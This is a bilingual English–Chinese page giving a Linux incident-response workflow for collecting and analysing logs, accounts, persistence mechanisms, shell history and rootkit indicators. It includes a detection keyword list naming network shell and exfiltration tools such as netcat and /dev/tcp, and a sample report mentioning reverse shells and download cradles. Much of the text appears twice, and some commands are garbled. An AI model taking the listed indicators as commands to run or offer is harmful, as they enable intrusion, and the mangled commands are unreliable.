Back to Details

analyzing-linux-system-artifacts

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Analyzing Linux System Artifacts

分析Linux系统工件

When to Use

使用场景

  • When investigating a compromised Linux server or workstation
  • For identifying persistence mechanisms (cron, systemd, SSH keys)
  • When tracing user activity through shell history and authentication logs
  • During incident response to determine the scope of a Linux-based breach
  • For detecting rootkits, backdoors, and unauthorized modifications
  • 调查被入侵的Linux服务器或工作站时
  • 识别持久化机制(cron、systemd、SSH密钥)时
  • 通过shell历史记录和认证日志追踪用户活动时
  • 事件响应期间确定基于Linux的入侵范围时
  • 检测Rootkit、后门和未授权修改时

Prerequisites

前提条件

  • Forensic image or live access to the Linux system (read-only)
  • Understanding of Linux file system hierarchy (FHS)
  • Knowledge of common Linux logging locations (/var/log/)
  • Tools: chkrootkit, rkhunter, AIDE, auditd logs
  • Familiarity with systemd, cron, and PAM configurations
  • Root access for complete artifact collection
  • Linux系统的取证镜像或只读实时访问权限
  • 了解Linux文件系统层次结构(FHS)
  • 熟悉常见Linux日志位置(/var/log/)
  • 工具:chkrootkit、rkhunter、AIDE、auditd logs
  • 熟悉systemd、cron和PAM配置
  • 完整收集工件所需的Root权限

Workflow

工作流程

Step 1: Mount and Collect System Artifacts

步骤1:挂载并收集系统工件

bash
undefined
bash
undefined

Mount forensic image read-only

Mount forensic image read-only

mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence

Create collection directories

Create collection directories

mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network}
mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network}

Collect authentication logs

Collect authentication logs

cp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/ cp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/

Collect user artifacts

Collect user artifacts

for user_dir in /mnt/evidence/home/*/; do username=$(basename "$user_dir") mkdir -p /cases/case-2024-001/linux/users/$username cp "$user_dir"/.bash_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.zsh_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp -r "$user_dir"/.ssh/ /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.bashrc /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.profile /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.viminfo /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.wget-hsts /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.python_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null done
for user_dir in /mnt/evidence/home/*/; do username=$(basename "$user_dir") mkdir -p /cases/case-2024-001/linux/users/$username cp "$user_dir"/.bash_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.zsh_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp -r "$user_dir"/.ssh/ /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.bashrc /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.profile /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.viminfo /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.wget-hsts /cases/case-2024-001/linux/users/$username/ 2>/dev/null cp "$user_dir"/.python_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null done

Collect root user artifacts

Collect root user artifacts

cp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null cp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null
cp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null cp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null

Collect system configuration

Collect system configuration

cp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/ cp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/ cp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
undefined
cp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/ cp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/ cp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/ cp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
undefined

Step 2: Analyze User Accounts and Authentication

步骤2:分析用户账户与认证

bash
undefined
bash
undefined

Analyze user accounts for anomalies

Analyze user accounts for anomalies

python3 << 'PYEOF' print("=== USER ACCOUNT ANALYSIS ===\n")
python3 << 'PYEOF' print("=== USER ACCOUNT ANALYSIS ===\n")

Parse /etc/passwd

Parse /etc/passwd

with open('/cases/case-2024-001/linux/config/passwd') as f: for line in f: parts = line.strip().split(':') if len(parts) >= 7: username, _, uid, gid, comment, home, shell = parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6]
        # Flag accounts with UID 0 (root equivalent)
        if uid == 0 and username != 'root':
            print(f"  ALERT: UID 0 account: {username} (shell: {shell})")

        # Flag accounts with login shells that shouldn't have them
        if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:
            print(f"  User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")

        # Flag system accounts with login shells
        if uid < 1000 and uid > 0 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
            print(f"  WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")
with open('/cases/case-2024-001/linux/config/passwd') as f: for line in f: parts = line.strip().split(':') if len(parts) >= 7: username, _, uid, gid, comment, home, shell = parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6]
        # Flag accounts with UID 0 (root equivalent)
        if uid == 0 and username != 'root':
            print(f"  ALERT: UID 0 account: {username} (shell: {shell})")

        # Flag accounts with login shells that shouldn't have them
        if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:
            print(f"  User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")

        # Flag system accounts with login shells
        if uid < 1000 and uid > 0 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
            print(f"  WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")

Parse /etc/shadow for account status

Parse /etc/shadow for account status

print("\n=== PASSWORD STATUS ===") with open('/cases/case-2024-001/linux/config/shadow') as f: for line in f: parts = line.strip().split(':') if len(parts) >= 3: username = parts[0] pwd_hash = parts[1] last_change = parts[2]
        if pwd_hash and pwd_hash not in ('*', '!', '!!', ''):
            hash_type = 'Unknown'
            if pwd_hash.startswith('$6$'): hash_type = 'SHA-512'
            elif pwd_hash.startswith('$5$'): hash_type = 'SHA-256'
            elif pwd_hash.startswith('$y$'): hash_type = 'yescrypt'
            elif pwd_hash.startswith('$1$'): hash_type = 'MD5 (WEAK)'
            print(f"  {username}: {hash_type} hash, last changed: day {last_change}")
PYEOF
print("\n=== PASSWORD STATUS ===") with open('/cases/case-2024-001/linux/config/shadow') as f: for line in f: parts = line.strip().split(':') if len(parts) >= 3: username = parts[0] pwd_hash = parts[1] last_change = parts[2]
        if pwd_hash and pwd_hash not in ('*', '!', '!!', ''):
            hash_type = 'Unknown'
            if pwd_hash.startswith('$6$'): hash_type = 'SHA-512'
            elif pwd_hash.startswith('$5$'): hash_type = 'SHA-256'
            elif pwd_hash.startswith('$y$'): hash_type = 'yescrypt'
            elif pwd_hash.startswith('$1$'): hash_type = 'MD5 (WEAK)'
            print(f"  {username}: {hash_type} hash, last changed: day {last_change}")
PYEOF

Analyze login history

Analyze login history

last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
undefined
last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
undefined

Step 3: Examine Persistence Mechanisms

步骤3:检查持久化机制

bash
undefined
bash
undefined

Check cron jobs for all users

Check cron jobs for all users

echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt
echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt

System cron

System cron

for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt done
for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt done

User cron tabs

User cron tabs

for cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do echo "--- User crontab: $(basename $cronfile) ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt done
for cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do echo "--- User crontab: $(basename $cronfile) ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt done

Check systemd services for persistence

Check systemd services for persistence

echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
/cases/case-2024-001/linux/persistence/systemd_analysis.txt
for svc in /mnt/evidence/etc/systemd/system/*.service; do echo "--- $(basename $svc) ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt done
echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
/cases/case-2024-001/linux/persistence/systemd_analysis.txt
for svc in /mnt/evidence/etc/systemd/system/*.service; do echo "--- $(basename $svc) ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt done

Check authorized SSH keys (backdoor detection)

Check authorized SSH keys (backdoor detection)

echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" -exec sh -c
'echo "--- {} ---"; cat {}; echo ""' ; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt
echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" -exec sh -c
'echo "--- {} ---"; cat {}; echo ""' ; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt

Check rc.local and init scripts

Check rc.local and init scripts

cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt
cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt

Check /etc/profile.d/ for login-triggered scripts

Check /etc/profile.d/ for login-triggered scripts

ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt
ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt

Check for LD_PRELOAD hijacking

Check for LD_PRELOAD hijacking

grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
undefined
grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
undefined

Step 4: Analyze Shell History and Command Execution

步骤4:分析Shell历史记录与命令执行

bash
undefined
bash
undefined

Analyze bash history for each user

Analyze bash history for each user

python3 << 'PYEOF' import os, glob
print("=== SHELL HISTORY ANALYSIS ===\n")
suspicious_commands = [ 'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c', 'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp', 'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd', 'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=', 'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync', 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred', 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/' ]
for hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'): username = hist_file.split('/')[-2] print(f"User: {username}")
with open(hist_file, 'r', errors='ignore') as f:
    lines = f.readlines()

print(f"  Total commands: {len(lines)}")
flagged = []
for i, line in enumerate(lines):
    line = line.strip()
    for cmd in suspicious_commands:
        if cmd in line.lower():
            flagged.append((i+1, line))
            break

if flagged:
    print(f"  Suspicious commands: {len(flagged)}")
    for lineno, cmd in flagged:
        print(f"    Line {lineno}: {cmd[:120]}")
print()
PYEOF
undefined
python3 << 'PYEOF' import os, glob
print("=== SHELL HISTORY ANALYSIS ===\n")
suspicious_commands = [ 'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c', 'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp', 'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd', 'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=', 'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync', 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred', 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/' ]
for hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'): username = hist_file.split('/')[-2] print(f"User: {username}")
with open(hist_file, 'r', errors='ignore') as f:
    lines = f.readlines()

print(f"  Total commands: {len(lines)}")
flagged = []
for i, line in enumerate(lines):
    line = line.strip()
    for cmd in suspicious_commands:
        if cmd in line.lower():
            flagged.append((i+1, line))
            break

if flagged:
    print(f"  Suspicious commands: {len(flagged)}")
    for lineno, cmd in flagged:
        print(f"    Line {lineno}: {cmd[:120]}")
print()
PYEOF
undefined

Step 5: Check for Rootkits and Modified Binaries

步骤5:检查Rootkit与修改后的二进制文件

bash
undefined
bash
undefined

Check for known rootkit indicators

Check for known rootkit indicators

Compare system binary hashes against known-good

Compare system binary hashes against known-good

find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/
-type f -executable -exec sha256sum {} ; > /cases/case-2024-001/linux/analysis/binary_hashes.txt
find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/
-type f -executable -exec sha256sum {} ; > /cases/case-2024-001/linux/analysis/binary_hashes.txt

Check for SUID/SGID binaries (potential privilege escalation)

Check for SUID/SGID binaries (potential privilege escalation)

find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt
find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt

Check for suspicious files in /tmp and /dev/shm

Check for suspicious files in /tmp and /dev/shm

find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null
-exec file {} ; > /cases/case-2024-001/linux/analysis/tmp_files.txt
find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null
-exec file {} ; > /cases/case-2024-001/linux/analysis/tmp_files.txt

Check for hidden files and directories

Check for hidden files and directories

find /mnt/evidence/ -name "." -not -path "/." -type f 2>/dev/null |
head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt
find /mnt/evidence/ -name "." -not -path "/." -type f 2>/dev/null |
head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt

Check kernel modules

Check kernel modules

ls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \
/cases/case-2024-001/linux/analysis/extra_modules.txt
ls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \
/cases/case-2024-001/linux/analysis/extra_modules.txt

Check for modified PAM configuration (authentication backdoors)

Check for modified PAM configuration (authentication backdoors)

diff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \
/cases/case-2024-001/linux/analysis/pam_changes.txt
undefined
diff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \
/cases/case-2024-001/linux/analysis/pam_changes.txt
undefined

Key Concepts

核心概念

ConceptDescription
/var/log/auth.logPrimary authentication log on Debian/Ubuntu systems
/var/log/securePrimary authentication log on RHEL/CentOS systems
wtmp/btmpBinary logs recording successful and failed login sessions
.bash_historyUser command history file (can be cleared by attackers)
crontabScheduled task system commonly used for persistence
authorized_keysSSH public keys granting passwordless access to an account
SUID bitFile permission allowing execution as the file owner (privilege escalation vector)
LD_PRELOADEnvironment variable that loads a shared library before all others (hooking technique)
概念描述
/var/log/auth.logDebian/Ubuntu系统上的主要认证日志
/var/log/secureRHEL/CentOS系统上的主要认证日志
wtmp/btmp记录成功和失败登录会话的二进制日志
.bash_history用户命令历史文件(可能被攻击者清除)
crontab常用于持久化的定时任务系统
authorized_keys授予账户无密码访问权限的SSH公钥
SUID位允许以文件所有者身份执行的文件权限(权限提升向量)
LD_PRELOAD在所有其他库之前加载共享库的环境变量(挂钩技术)

Tools & Systems

工具与系统

ToolPurpose
chkrootkitRootkit detection scanner for Linux systems
rkhunterRootkit Hunter - checks for rootkits, backdoors, and local exploits
AIDEAdvanced Intrusion Detection Environment - file integrity monitor
auditdLinux audit framework for system call and file access monitoring
last/lastbParse wtmp/btmp for login and failed login history
Plaso/log2timelineSuper-timeline creation including Linux artifacts
osquerySQL-based system querying for live forensic investigation
VelociraptorEndpoint agent with Linux artifact collection capabilities
工具用途
chkrootkitLinux系统的Rootkit检测扫描器
rkhunterRootkit Hunter - 检查Rootkit、后门和本地漏洞
AIDEAdvanced Intrusion Detection Environment - 文件完整性监控工具
auditd用于系统调用和文件访问监控的Linux审计框架
last/lastb解析wtmp/btmp获取登录和失败登录历史
Plaso/log2timeline创建包含Linux工件的超级时间线
osquery基于SQL的系统查询工具,用于实时取证调查
Velociraptor具备Linux工件收集能力的端点代理

Common Scenarios

常见场景

Scenario 1: SSH Brute Force Followed by Compromise Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.
Scenario 2: Web Server Compromise via Application Vulnerability Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.
Scenario 3: Insider Threat on Database Server Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.
Scenario 4: Crypto-Miner on Cloud Instance Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.
场景1:SSH暴力破解后入侵 分析auth.log中的失败SSH尝试及后续成功记录,识别攻击IP,检查.bash_history中的入侵后命令,查看authorized_keys中新增的后门密钥,检查crontab中的持久化设置,审查网络连接。
场景2:通过应用漏洞入侵Web服务器 检查Web服务器访问和错误日志中的攻击尝试,查看/tmp和/dev/shm中的Webshell,分析Web服务器用户(www-data)的活动,检查通过SUID二进制文件或内核漏洞进行的权限提升,审查出站连接。
场景3:数据库服务器上的内部威胁 分析可疑用户的bash_history中的数据库导出命令,检查主目录或/tmp中的大型tar/zip文件,查看用于数据传输的scp/rsync命令,审查用于自动数据泄露的cron任务,检查USB设备日志。
场景4:云实例上的加密挖矿程序 检查/proc中的高CPU进程(实时环境)或systemd服务文件,查看用于重启挖矿程序的crontab条目,检查/tmp中的挖矿二进制文件,分析与矿池通信的网络连接,审查authorized_keys中的攻击者访问权限。

Output Format

输出格式

Linux Forensics Summary:
  System: webserver01 (Ubuntu 22.04 LTS)
  Hostname: webserver01.corp.local
  Kernel: 5.15.0-91-generic

  User Accounts:
    Total: 25 (3 with UID 0 - 1 ANOMALOUS)
    Interactive shells: 8 users
    Recently created: admin2 (created 2024-01-15)

  Authentication Events:
    Successful SSH logins: 456
    Failed SSH attempts: 12,345 (from 23 unique IPs)
    Sudo executions: 89

  Persistence Mechanisms Found:
    Cron jobs: 3 suspicious (reverse shell, miner restart)
    Systemd services: 1 unknown (update-checker.service)
    SSH keys: 2 unauthorized keys in root authorized_keys
    rc.local: Modified with download cradle

  Suspicious Activity:
    - bash_history contains wget to pastebin URL
    - SUID binary /tmp/.hidden/escalate found
    - /dev/shm/ contains compiled ELF binary
    - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so

  Report: /cases/case-2024-001/linux/analysis/
Linux Forensics Summary:
  System: webserver01 (Ubuntu 22.04 LTS)
  Hostname: webserver01.corp.local
  Kernel: 5.15.0-91-generic

  User Accounts:
    Total: 25 (3 with UID 0 - 1 ANOMALOUS)
    Interactive shells: 8 users
    Recently created: admin2 (created 2024-01-15)

  Authentication Events:
    Successful SSH logins: 456
    Failed SSH attempts: 12,345 (from 23 unique IPs)
    Sudo executions: 89

  Persistence Mechanisms Found:
    Cron jobs: 3 suspicious (reverse shell, miner restart)
    Systemd services: 1 unknown (update-checker.service)
    SSH keys: 2 unauthorized keys in root authorized_keys
    rc.local: Modified with download cradle

  Suspicious Activity:
    - bash_history contains wget to pastebin URL
    - SUID binary /tmp/.hidden/escalate found
    - /dev/shm/ contains compiled ELF binary
    - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so

  Report: /cases/case-2024-001/linux/analysis/